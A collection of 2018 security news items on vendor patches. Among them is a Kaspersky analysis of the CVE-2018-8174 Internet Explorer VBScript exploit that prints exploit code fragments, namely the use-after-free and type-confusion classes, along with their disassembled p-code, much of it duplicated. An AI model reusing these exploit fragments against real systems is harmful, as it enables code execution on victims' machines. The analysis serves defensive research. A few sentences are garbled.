Adobe addressed three server-side request forgery (SSRF) vulnerabilities in Experience Manager that can lead to the exposure of sensitive information, fix authentication bypass and insecure library loading flaws in Adobe Connect. None of the flaws in Experience Manager and Adobe Connect was rated as critical.

The good news for the Adobe customers is that the company is not aware of any attack in the wild that exploited one of the flaws addressed with the July Patch Tuesday security updates.


Thunderbird Version 52.9 addresses several issues, including the EFAIL flaw
6.7.2018 securityaffairs
Vulnerebility

The Thunderbird team released a new version of the popular email client that addresses many security issued, including the EFAIL vulnerability.
Thunderbird has released a new version to address a dozen security vulnerabilities, including the EFAIL encryption issue that was discovered in May.

The new version addresses two EFAIL-related issues in the way Thunderbird handles encrypted messages.

“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers that discovered the EFAIL flaw.

“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”

The new Thunderbird 52.9 addresses the CVE-2018-12372 flaw that can be exploited by attackers to build S/MIME and PGP decryption stubs in HTML messages.

“Decrypted S/MIME parts, when included in HTML crafted for an attack, can leak plaintext when included in a HTML reply/forward.” reads the security advisory published by the Mozilla Foundation.

The new version also fixes the CVE-2018-12373 flaw that could result in the leakage of S/MIME plaintext when a message is forwarded.

Thunderbird 52.9 also addresses some critical flaws such as the CVE-2018-12359 that is a buffer overflow vulnerability that could be exploited to crash a vulnerable system

“A buffer overflow can occur when rendering canvas content while adjusting the height and width of the <canvas> element dynamically, causing data to be written outside of the currently computed boundaries.”

Thunderbird

The new release also fixes a use-after-free flaw tracked as CVE-2018-12360 that could be exploited to crash a target system.

“A use-after-free vulnerability can occur when deleting an
input
element during a mutation event handler triggered by focusing that element. This results in a potentially exploitable crash.” continues the advisory.

Another security issue is related to the executable SettingContent-ms files, the security researcher Matt Nelson discovered that Windows 10 users weren’t getting warned when they were opening such kind of files. This issue was tracked as CVE-2018-12368 and could be used by attackers to execute arbitrary code by tricking users into opening the files.

“Windows 10 does not warn users before opening executable files with the SettingContent-ms extension even when they have been downloaded from the internet and have the “Mark of the Web.” continues the advisory.

“Without the warning, unsuspecting users unfamiliar with this new file type might run an unwanted executable. This also allows a WebExtension with the limited downloads.open permission to execute arbitrary code without user interaction on Windows 10 systems”.

Thunderbird also addressed some memory sasome memoryat derived from the Firefox code base.

The good news is that the bugs coild not ne directly exploitable in the e-mail client because scripting is disabled while users are reading messages.


Google Fixes Critical Android Vulnerabilities
5.7.2018 securityweek 
Vulnerebility

Google this week released its July 2018 set of Android patches to address tens of vulnerabilities in the mobile operating system, including several rated as Critical.

The Internet giant addressed 11 vulnerabilities as part of the 2018-07-01 security patch level, including three rated Critical and 8 High risk bugs. The issues impact framework, media framework, and system.

All three Critical severity bugs are remote code execution flaws, one for each of the impacted components. The remaining vulnerabilities include information disclosure bugs, elevation of privilege issues, and denial of service flaws.

“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google notes in an advisory.

Affected operating system versions include Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.

A total of 32 flaws were addressed as part of the 2018-07-05 security patch level, 8 rated Critical severity and 24 considered High risk.

These issues impact Kernel, Qualcomm, and Qualcomm closed-source components such as IPV6 stack, futex, USB driver, WLAN, nsfs, OpenGL ES driver, and ADSPRPC heap manager.

Of the resolved vulnerabilities, 22 were impacting Qualcomm closed-source components. These include 7 Critical issues and 15 High risk flaws.

6 vulnerabilities were addressed in Qualcomm components, including a Critical remote code execution flaw, one High severity remote code execution bug, two High risk information disclosure issues, and two elevation of privilege vulnerabilities.

All of the 4 flaws addressed in Kernel components were elevation of privilege bugs.

This month, Google also addressed 26 Medium severity issues impacting Pixel and Nexus devices. Affected components include framework, media framework, system, Kernel components, and Qualcomm components.

Most of the addressed issues were elevation of privilege bugs, but remote code execution and information disclosure security vulnerabilities were also addressed.

Additionally, the Internet giant released a functional update for the Pixel and Nexus devices, to “improve consistency of Wi-Fi connections with certain routers,” the advisory reads.

Last month, Google addressed a dozen Critical flaws in Android, along with tens of High risk issues. The company also resolved over 60 vulnerabilities affecting Pixel and Nexus devices, most of which were rated Medium severity.


Delving deep into VBScript

5.7.2018 Kaspersky Vulnerebility
Analysis of CVE-2018-8174 exploitation
In late April we found and wrote a description of CVE-2018-8174, a new zero-day vulnerability for Internet Explorer that was picked up by our sandbox. The vulnerability uses a well-known technique from the proof-of-concept exploit CVE-2014-6332 that essentially “corrupts” two memory objects and changes the type of one object to Array (for read/write access to the address space) and the other object to Integer to fetch the address of an arbitrary object.

But whereas CVE-2014-6332 was aimed at integer overflow exploitation for writing to arbitrary memory locations, my interest lay in how this technique was adapted to exploit the use-after-free vulnerability. To answer this question, let’s consider the internal structure of the VBScript interpreter.

Undocumented platform
Debugging a VBScript executable is a tedious task. Before the script is executed, it is compiled into p-code, which is then interpreted by the virtual machine. There is no open source information about the internal structure of this virtual machine and its instructions. It took me a lot of effort to track down a couple of web pages with Microsoft engineer reports dated 1999 and 2004 that shed some light on the p-code. There was enough information there for me to fully reverse-engineer all the VM instructions and write a disassembler! The final scripts for disassembling VBScript p-code in the memory of the IDA Pro and WinDBG debuggers are available in our Github repository.

With an understanding of the interpreted code, we can precisely monitor the execution of the script: we have full information about where the code is being executed at any given moment, and we can observe all objects that are created and referenced by the script. All this greatly assists in the analysis.

The best place to run the disassembling script is the CScriptRuntime::RunNoEH function, which directly interprets the p-code.

Important fields in the CScriptRuntime class

The CScriptRuntime class contains all information about the state of the interpreter: local variables, function arguments, pointers to the top of the stack and the current instruction, plus the address of the compiled script.

The VBScript virtual machine is stack-oriented and consists of slightly more than 100 instructions.

All variables (local arguments and ones on the stack) are represented as a VARIANT structure occupying 16 bytes, where the upper word indicates the data type. Some of the type values are given on the relevant MSDN page.

CVE-2018-8174 exploitation
Below is the code and disassembled p-code of class ‘Class1’:

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
 

Class Class1
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class

Function 34 (‘Class1’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass
0005 OP_FnBindEx ‘p’ 35 FALSE
000F OP_FnBindEx ‘SetProp’ 36 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 35 (‘p’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8252,8264)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
Function 36 (‘SetProp’) [max stack = 1]:
arg count = 1
arg -1 = ref Variant ‘value’
lcl count = 0
Pcode:
***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr -1
0005 OP_NamedSt ‘mem’
***BOS(8304,8315)*** SetProp=(0) *****
000A OP_Bos1 1
000C OP_IntConst 0
000E OP_LocalSt 0
***BOS(8317,8329)*** End Function *****
0011 OP_Bos1 2
0013 OP_FnReturn
0014 OP_Bos0
0015 OP_FuncEnd
 

Function 34 (‘Class1’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass
0005 OP_FnBindEx ‘p’ 35 FALSE
000F OP_FnBindEx ‘SetProp’ 36 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 35 (‘p’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8252,8264)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
Function 36 (‘SetProp’) [max stack = 1]:
arg count = 1
arg –1 = ref Variant ‘value’
lcl count = 0
Pcode:
***BOS(8292,8301)*** mem=Value *****
0000 OP_Bos1 0
0002 OP_LocalAdr –1
0005 OP_NamedSt ‘mem’
***BOS(8304,8315)*** SetProp=(0) *****
000A OP_Bos1 1
000C OP_IntConst 0
000E OP_LocalSt 0
***BOS(8317,8329)*** End Function *****
0011 OP_Bos1 2
0013 OP_FnReturn
0014 OP_Bos0
0015 OP_FuncEnd
Function 34 is a constructor of class ‘Class1’.

The OP_CreateClass instruction calls the VBScriptClass::Create function to create a VBScriptClass object.

The OP_FnBindEx and OP_CreateVar instructions try to fetch the variables passed in the arguments, and since they do not yet exist, they are created by the VBScriptClass::CreateVar function.

This diagram shows how variables can be fetched from a VBScriptClass object. The value of the variable is stored in the VVAL structure:

To understand the exploitation, it is important to know how variables are represented in the VBScriptClass structure.

When the OP_NamedSt ‘mem’ instruction is executed in function 36 (‘SetProp’), it calls the Default Property Getter of the instance of the class that was previously stacked and then stores the returned value in the variable ‘mem’.

***BOS(8292,8301)*** mem=Value *****
0000OP_Bos1 0
0002OP_LocalAdr -1 <-------- put argument on stack
0005OP_NamedSt ‘mem’ <-------- if it's a class dispatcher with Default Property Getter, call and store returned value in mem

Below is the code and disassembled p-code of function 30 (p), which is called during execution of the OP_NamedSt instruction:

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl(“174088534690791e-324”)
For IIIl=0 To 6
IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
Set IIIlI(IIIl)=llII
Next
End Property
End Class
 

Class lllIIl
Public Default Property Get P
Dim llII
P=CDbl(“174088534690791e-324”)
For IIIl=0 To 6
IIIlI(IIIl)=0
Next
Set llII=New Class2
llII.mem=lIlIIl
For IIIl=0 To 6
Set IIIlI(IIIl)=llII
Next
End Property
End Class

Function 30 (‘p’) [max stack = 3]:
arg count = 0
lcl count = 1
lcl 1 = Variant ‘llII’
tmp count = 4
Pcode:
***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0
***BOS(8763,8782)*** For IIIl=(0) To (6) *****
0011 OP_Bos1 1
0013 OP_IntConst 0
0015 OP_IntConst 6
0017 OP_IntConst 1
0019 OP_ForInitNamed ‘IIIl’ 5 4
0022 OP_JccFalse 0047
***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
0027 OP_Bos1 2
0029 OP_IntConst 0
002B OP_NamedAdr ‘IIIl’
0030 OP_CallNmdSt ‘IIIlI’ 1
***BOS(8826,8830)*** Next *****
0037 OP_Bos1 3
0039 OP_ForNextNamed ‘IIIl’ 5 4
0042 OP_JccTrue 0027
***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1
***BOS(8876,8891)*** llII.mem=lIlIIl *****
0051 OP_Bos1 5
0053 OP_NamedAdr ‘lIlIIl’
0058 OP_LocalAdr 1
005B OP_MemSt ‘mem’
….
 

Function 30 (‘p’) [max stack = 3]:
arg count = 0
lcl count = 1
lcl 1 = Variant ‘llII’
tmp count = 4
Pcode:
***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000 OP_Bos1 0
0002 OP_StrConst ‘174088534690791e-324’
0007 OP_CallNmdAdr ‘CDbl’ 1
000E OP_LocalSt 0
***BOS(8763,8782)*** For IIIl=(0) To (6) *****
0011 OP_Bos1 1
0013 OP_IntConst 0
0015 OP_IntConst 6
0017 OP_IntConst 1
0019 OP_ForInitNamed ‘IIIl’ 5 4
0022 OP_JccFalse 0047
***BOS(8809,8824)*** IIIlI(IIIl)=(0) *****
0027 OP_Bos1 2
0029 OP_IntConst 0
002B OP_NamedAdr ‘IIIl’
0030 OP_CallNmdSt ‘IIIlI’ 1
***BOS(8826,8830)*** Next *****
0037 OP_Bos1 3
0039 OP_ForNextNamed ‘IIIl’ 5 4
0042 OP_JccTrue 0027
***BOS(8855,8874)*** Set llII=New Class2 *****
0047 OP_Bos1 4
0049 OP_InitClass ‘Class2’
004E OP_LocalSet 1
***BOS(8876,8891)*** llII.mem=lIlIIl *****
0051 OP_Bos1 5
0053 OP_NamedAdr ‘lIlIIl’
0058 OP_LocalAdr 1
005B OP_MemSt ‘mem’
….
The first basic block of this function is:

***BOS(8626,8656)*** P=CDbl(“174088534690791e-324”) *****
0000OP_Bos1 0
0002OP_StrConst ‘174088534690791e-324’
0007OP_CallNmdAdr’CDbl’ 1
000EOP_LocalSt 0

This block converts the string ‘174088534690791e-324’ to VARIANT and stores it in the local variable 0, reserved for the return value of the function.

VARIANT obtained after converting ‘174088534690791e-324’ to double

After the return value is set but before it is returned, this function performs:

For IIIl=0 To 6
IIIlI(IIIl)=0
Next

This calls the garbage collector for the ‘Class1’ instance and results in a dangling pointer reference due to the use-after-free vulnerability in Class_Terminate() that we discussed earlier.

In the line

***BOS(8855,8874)*** Set llII=New Class2 *****
0047OP_Bos1 4
0049OP_InitClass ‘Class2’
004EOP_LocalSet 1

the OP_InitClass ‘Class2’ instruction creates an “evil twin” instance of class ‘Class1’ at the location of the previously freed VBScriptClass, which is still referenced by the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’).

Class ‘Class2’ is the “evil twin” of class ‘Class1’:

Class Class2
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class
 

Class Class2
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+(8)))
End Function
Function SPP
End Function
End Class

Function 31 (‘Class2’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass ‘Class2’
0005 OP_FnBindEx ‘P0123456789’ 32 FALSE
000F OP_FnBindEx ‘SPP’ 33 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 32 (‘P0123456789’) [max stack = 2]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
0000 OP_Bos1 0
0002 OP_NamedAdr ‘IlII’
0007 OP_IntConst 8
0009 OP_Add
000A OP_CallNmdAdr ‘mem’ 1
0011 OP_CallNmdAdr ‘LenB’ 1
0018 OP_LocalSt 0
***BOS(8423,8435)*** End Function *****
001B OP_Bos1 1
001D OP_FnReturn
001E OP_Bos0
001F OP_FuncEnd
Function 33 (‘SPP’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8451,8463)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
 

Function 31 (‘Class2’) [max stack = 1]:
arg count = 0
lcl count = 0
Pcode:
0000 OP_CreateClass ‘Class2’
0005 OP_FnBindEx ‘P0123456789’ 32 FALSE
000F OP_FnBindEx ‘SPP’ 33 FALSE
0019 OP_CreateVar ‘mem’ FALSE
001F OP_LocalSet 0
0022 OP_FnReturn
Function 32 (‘P0123456789’) [max stack = 2]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8390,8421)*** P0123456789=LenB(mem(IlII+(8))) *****
0000 OP_Bos1 0
0002 OP_NamedAdr ‘IlII’
0007 OP_IntConst 8
0009 OP_Add
000A OP_CallNmdAdr ‘mem’ 1
0011 OP_CallNmdAdr ‘LenB’ 1
0018 OP_LocalSt 0
***BOS(8423,8435)*** End Function *****
001B OP_Bos1 1
001D OP_FnReturn
001E OP_Bos0
001F OP_FuncEnd
Function 33 (‘SPP’) [max stack = 0]:
arg count = 0
lcl count = 0
Pcode:
***BOS(8451,8463)*** End Function *****
0000 OP_Bos1 0
0002 OP_FnReturn
0003 OP_Bos0
0004 OP_FuncEnd
The location of variables in memory is predictable. The amount of data occupied by the VVAL structure is calculated using the formula 0x32 + the length of the variable name in UTF-16.

Below is a diagram that shows the location of ‘Class1’ variables relative to ‘Class2’ variables when ‘Class2’ is allocated in place of ‘Class1’.

When execution of the OP_NamedSt ‘mem’ instruction in function 36 (‘SetProp’) is complete, the value returned by function 30 (‘p’) is written to memory through the dangling pointer of VVAL ‘mem’ in Class1, overwriting the VARIANT type of VVAL ‘mem’ in Class2.

VARIANT of type Double overwrites the VARIANT type from String to Array

Thus, an object of type String is converted to an object of type Array, and data that was previously considered to be a string is treated as an Array control structure, allowing access to be gained to the entire address space of the process.

Conclusion
Our scripts for disassembling VBScript compiled into p-code enable VBScript debugging at the bytecode level, which helps to analyze exploits and understand how VBScript operates. They are available in our Github repository

The case of CVE-2018-8174 demonstrates that when memory allocations are highly predictable, use-after-free vulnerabilities are easy to exploit. The in-the-wild exploit targets older versions of Windows. The location of objects in memory required for its exploitation is most likely to occur in Windows 7 and Windows 8.1.

Automatic Exploit Protection (AEP), part of Kaspersky Lab products, blocks all stages of the exploit with the following verdicts:

HEUR:Exploit.MSOffice.Generic
HEUR:Exploit.Script.CVE-2018-8174.a
HEUR:Exploit.Script.Generic
HEUR:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic


Huawei enterprise and broadcast products have a crypto bug. Fix it now!
4.7.2018 securityaffairs
Vulnerebility

Huawei has rolled out security fixes for some enterprise and broadcast products to address a cryptography issue tracked as CVE-2017-17174.
Huawei has released security updates for some enterprise and broadcast products to address a cryptography issue that was discovered in late 2017.

The vulnerability, tracked as CVE-2017-17174, is related to the implementation of an insecure encryption algorithm and could be exploited to power MiTM attack to decrypt a session key and recover the content of the entire session.

“There is a weak algorithm vulnerability in some Huawei products. A remote, unauthenticated attacker may capture traffic between clients and the affected products.” reads the security advisory published by Huawei.

“Due to the use of insecure encryption algorithm, the attacker may decrypt the session key by some cryptanalytic operations and the traffic between the server and the client. Successful exploit may cause information leak.”

The following Huawei products using RSA encryption in TLS are potentially vulnerable:

The RSE6500 Recording and Streaming Engine version V500R002C00. A high-performance, full-HD recording and streaming engine that supports live video multicast and mobile Video on Demand (VoD).
The SoftCo unified communications software version V200R003C20SPCb00;
The VP9660 video conferencing multipoint control units version V600R006C10;
Multiple versions of its eSpace U1981 IP telephony and enterprise communications universal SIP gateway.
Huawei

Huawei rated the vulnerability as a 5.3 (medium) because it is not easy to exploit, the company has released software updates to address the flaw for all of its solution except for the unified communications software SoftCo that has been deprecated.

Every flaw discovered in products of Chinese and Russia firm trigger the alarm of governments that are already banning their solution from critical infrastructure and government offices.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to unacceptable security risk they pose.


Flaws Expose Siemens Central Plant Clocks to Attacks
4.7.2018 securityweek
Vulnerebility

Siemens informed customers on Tuesday that some of its SICLOCK central plant clocks are affected by several vulnerabilities, including ones that have been rated “critical.”

Siemens SICLOCK devices are used to synchronize time in industrial plants. The central plant clock ensures stability in case of a failure or loss of reception at the primary time source.

According to the German industrial giant, SICLOCK systems are affected by a total of six vulnerabilities. The security holes have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856.

Siemens SICLOCK vulnerabilities

Three of the flaws have been classified as critical. One of them allows an attacker with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition – and possibly reboot – by sending it specially crafted packets.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed,” Siemens wrote in its advisory. “The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

Another critical vulnerability can be exploited by an attacker with access to UDP port 69 to modify the firmware on a targeted SICLOCK device. Access to the same port is also required for the exploitation of a different critical flaw that allows an attacker to modify the administrative client stored on the device and execute arbitrary code.

A high severity flaw disclosed by Siemens can allow a network attacker to bypass authentication, but exploitation requires the hacker to obtain specific information about the targeted device.

Siemens SICLOCK vulnerabilities

The remaining security holes are a medium severity issue that allows a man-in-the-middle (MitM) attacker to intercept unencrypted passwords stored in client configuration files, and a low severity bug that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Four of the six vulnerabilities can be exploited without any user interaction. Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The impacted products are SICLOCK TC100, which is designed for smaller plants, and SICLOCK TC400. Since both products are in the process of being phased out, Siemens has not released any firmware updates, and instead advised customers to apply a series of workarounds and mitigations that should reduce the risk of attacks.

Mitigations include the installation of redundant time sources and implementation of plausibility checks for critical controllers in the plant, and protecting network access to impacted devices.


Microsoft revealed that 2 Zero-Days found in March were part of a cyber weapon in an early development stage
3.7.2018 securityaffairs
Vulnerebility

Microsoft published technical details of 2 zero-days that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.
Security researchers from Microsoft have published technical details of two zero-day vulnerabilities that have been recently discovered after someone uploaded a weaponized PDF file to VirusTotal.

The two issues were addressed by Microsoft with May 2018 Patch Tuesday before threat actors used it in attacks in the wild.

The first zero-day vulnerability is a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990), the second one is a privilege escalation flaw in Microsoft Windows (CVE-2018-8120).

“The first exploit attacks the Adobe JavaScript engine to run shellcode in the context of that module. The second exploit, which does not affect modern platforms like Windows 10, allows the shellcode to escape Adobe Reader sandbox and run with elevated privileges from Windows kernel memory. ESET provided an analysis of the exploitation routines in the sample PDF.” reads the analysis published by Microsoft.

Microsoft shared the technical details of both the flaw only now because it gave users enough time to update their operating systems and Adobe software.

In late March, experts at ESET analyzed a malicious PDF file that was uploaded on VirusTotal and provided it to the Microsoft security team.

The experts flagged the document “as a potential exploit for an unknown Windows kernel vulnerability.”

The analysis conducted by the Microsoft team revealed that the document includes two different zero-day exploits, one for Adobe Acrobat and Reader and one for Microsoft Windows.

zero-days

According to Microsoft, the weaponized PDF file was in the early development stage, the code used by attackers appeared a PoC code and the weaponized file did not deliver a malicious payload.

“Although the PDF sample was found in VirusTotal, we have not observed actual attacks perpetrated using these exploits. The exploit was in early development stage, given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code.” reads the analysis published by Microsoft.

Someone combined the two zero-days to build a very powerful attack vector.

The Adobe Acrobat and Reader exploit is included in the document as a specially crafted JPEG 2000 image that contains the JavaScript exploit code used to trigger a double-free vulnerability in the software to run shellcode.

zero-days

The attackers were trying to chain this exploit with the second Windows kernel exploit to break the Adobe Reader sandbox and run it with elevated privileges.

Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.

The PoC payload used in the sample dropped an empty vbs file in the Startup folder.

“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concluded ESET.

“Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Both Microsoft and ESET published technical details of the two zero-days, both firms also shared the IoCs for the exploits.


Vulnerabilities Patched in VMware ESXi, Workstation, Fusion
2.7.2018 securityweek 
Vulnerebility

VMware informed customers last week that it patched several vulnerabilities that can lead to a denial-of-service (DoS) condition or information disclosure in its ESXi, Workstation, and Fusion products.

VMware described the flaws as out-of-bounds read issues in the shader translator component. An attacker with regular user privileges can exploit the security holes to obtain information or crash virtual machines.

The vulnerabilities, classified as “important,” are tracked as CVE-2018-6965, CVE-2018-6966 and CVE-2018-6967. A Tencent ZhanluLab researcher who uses the online moniker “RanchoIce” has been credited for reporting the flaws to VMware. A researcher from Cisco Talos independently discovered CVE-2018-6965.

According to VMware, the flaws impact ESXi 6.7 and Workstation 14.x running on any platform, and Fusion 10.x running on OS X. Patches and updates have been released for each of the affected products.

Cisco Talos has published an advisory containing technical details for CVE-2018-6965. The company has assigned a CVSS score of 6.5 to this vulnerability, which puts it near the “high severity” range.

“A specially crafted pixel shader can cause a read access violation resulting in, at least, denial of service. An attacker can provide a specially crafted shader file (either in binary or text form) to trigger this vulnerability. This vulnerability can be triggered from VMware guest and VMware host, which will be affected (leading to vmware-vmx.exe process crash on host),” Talos wrote in its advisory.

“In short, it is possible to create a shader in such a way that it will cause invalid pointer calculation. The pointer is later used for read memory operations. This causes access violation due to the pointer being invalid, which results in a denial of service, but could potentially be turned into an information disclosure vulnerability,” Talos added.


Unpatched WordPress Flaw Leads to Site Takeover, Code Execution
28.6.2018 securityweek
Vulnerebility

A file deletion vulnerability that remains unpatched 7 months after being reported allows for the complete takeover of WordPress sites and for arbitrary code execution.

The security flaw supposedly impacts all WordPress versions, including the latest 4.9.6 iteration. An attacker looking to exploit the issue would first have to gain privileges to edit and delete media files.

“Thus, the vulnerability can be used to escalate privileges attained through the takeover of an account with a role as low as Author, or through the exploitation of another vulnerability/misconfiguration,” RIPS Technologies’ Karim El Ouerghemmi explains.

An attacker targeting the vulnerability can delete any file of the WordPress installation, as well as any file on the server the PHP process user has permissions to delete files from. An attacker could erase an entire WordPress installation and could also circumvent security measures to execute arbitrary code on the server.

Files that can be deleted include .htaccess (which may contain security related constraints), index.php files (granting an attacker a listing of all files in the WordPress directories), and wp-config.php (which contains the database credentials).

Deleting wp-config.php triggers the WordPress installation process on the next visit to the website, which allows the attacker to undergo the installation process and use admin credentials of their choice, thus being able to execute arbitrary code on the server.

The security researcher reported the vulnerability to WordPress in November last year, via HackerOne. The WordPress security team triaged and verified the issue soon after receiving the report, but no patch has been released to date, although they apparently estimated in January that a fix would become available within six months.

A hotfix available from RIPS Technologies can be integrated by site admins into existing WordPress installations by adding it to the functions.php file of the active theme. By making sure that the data provided for the meta-value thumb does not contain code that would make path traversal possible, the hotfix prevents security-relevant files from being deleted.

“The provided fix shall ultimately be seen as a temporary fix in order to prevent attacks. We cannot oversee all possible backwards compatibility problems with WordPress plugins and advise to make any modifications to your WordPress files with caution,” RIPS Technologies notes.

Because it requires a user account, the vulnerability cannot be abused for the exploitation of arbitrary WordPress sites at scale. However, websites that share multiple user accounts should apply a hotfix, El Ouerghemmi points out.


Unpatched WordPress file deletion vulnerability could allow site takeover and code execution
28.6.2018 securityaffairs
Vulnerebility

Seven months ago, security experts discovered a critical file deletion vulnerability that affects all WordPress versions, currently, the issue is still unpatched.
The vulnerability could be exploited to complete takeover of the websites running the popular CMS and gain arbitrary code execution. The issue is severe if we consider the potential impact, WordPress is the most popular CMS and according to w3tech, it is used by approximately 30% of all websites

A pre-requisite to exploit the vulnerability is that the attacker would have to gain privileges to edit and delete media files. The vulnerability cannot be exploited in massive attacks because it requires a user account.

“The vulnerability was reported 7 months ago to the WordPress security team but still remains unpatched.” reads a blog post published by RIPS Technologies.

“Thus, the vulnerability can be used to escalate privileges attained through the takeover of an account with a role as low as Author, or through the exploitation of another vulnerability/misconfiguration,”

An attacker could exploit the file deletion vulnerability to delete any file of the WordPress installation, as well as any other file on the server on which the PHP process user has the proper permissions to delete.

An arbitrary file deletion flaw occurs when it is possible to pass unsanitized input to a file deletion function.

In PHP an arbitrary file deletion occurs when the unlink() function is called and user input can affect parts of or the whole parameter $filename, which is the path of the file to delete, without undergoing proper sanitization.

The flaw resides in the WordPress Core, the code to trigger it was found in the wp-includes/post.php file:

file deletion vulnerability WordPress

In the wp_delete_attachement() function the content of $meta[‘thumb’] is used to invoke the unlink() without undergoing any sanitization.

The purpose of this snippet of code is to delete the thumbnail of an image alongside its deletion.

The exploitation of the flaw could allow the deletion of the entire WordPress installation and could allow circumventing security measures to execute arbitrary code on the server.

The experts highlighted that the attacker can delete the following files:

.htaccess that could include in some occasions security-related constraints (e.g., access constraints to some folders).
index.php files used to prevent the attacker listing files in WordPress folders.
wp-config.php that contains the database credentials.
RIPS Technologies reported the vulnerability to WordPress in November 2017, through the bug bounty program via HackerOne, even if the WordPress team estimated the availability of a patch in six months, no fix has been released to date.

The experts published a video PoC of the attack showing how to delete the wp-config.php file in order to trigger the WordPress installation process on the next visit to the website. The WordPress install acts as if it hasn’t been installed yet and the attacker could abuse this status to execute arbitrary code.

“Deleting this file of a WordPress installation would trigger the WordPress installation process on the next visit to the website. This is due to the fact that wp-config.php contains the database credentials, and without its presence, WordPress acts as if it hasn’t been installed yet.” continue the analysis. “An attacker could delete this file, undergo the installation process with credentials of his choice for the administrator account and, finally, execute arbitrary code on the server.”

The researchers provided a hotfix that can be integrated by admins into existing WordPress installations by adding it to the functions.php file of the active theme.

The fix checks that the data provided for the meta-value thumb does not contain code that would make path traversal possible, in this way the attacker cannot delete any file.

“The provided fix shall ultimately be seen as a temporary fix in order to prevent attacks. We cannot oversee all possible backwards compatibility problems with WordPress plugins and advise to make any modifications to your WordPress files with caution,” RIPS Technologies concludes.


Sophos Patches Privilege Escalation Flaws in SafeGuard Products
26.6.2018 securityweek 
Vulnerebility

Researchers discovered several vulnerabilities in Sophos SafeGuard full-disk and file encryption products. The flaws allow an attacker to escalate privileges on a compromised device and execute arbitrary code with SYSTEM permissions.

A total of seven local privilege escalation vulnerabilities have been identified by researchers at Nettitude. The security holes can be exploited via various IOCTL calls using specially crafted input buffers that allow attackers to control the execution path.

Nettitude has published technical details for each of the flaws, along with a video showing how an attacker with access to the targeted device can escalate privileges to SYSTEM.

According to an advisory published on Tuesday by Sophos, the vulnerabilities affect various versions of SafeGuard Enterprise Client, SafeGuard Easy and SafeGuard LAN Crypt for Windows. The bugs have been assigned the CVE identifiers CVE-2018-6851 through CVE-2018-6857.

“Sophos is not aware of any attacks leveraging those vulnerabilities or exploits for them being available,” the security firm wrote in its advisory. “Exploitation of those vulnerabilities requires running malicious code on the target machine and can result in privilege escalation. This vulnerability is not remotely exploitable (i.e. over the network).”

The vulnerabilities were reported to Sophos in January and patches were created in April. Sophos has advised users to install the available patches.


Oracle issued security patches for recently discovered Spectre and Meltdown issues
26.6.2018 securityaffairs
Vulnerebility

Last week Oracle started releasing software and microcode updates for products affected by the recently disclosed variants of the Spectre and Meltdown flaws.
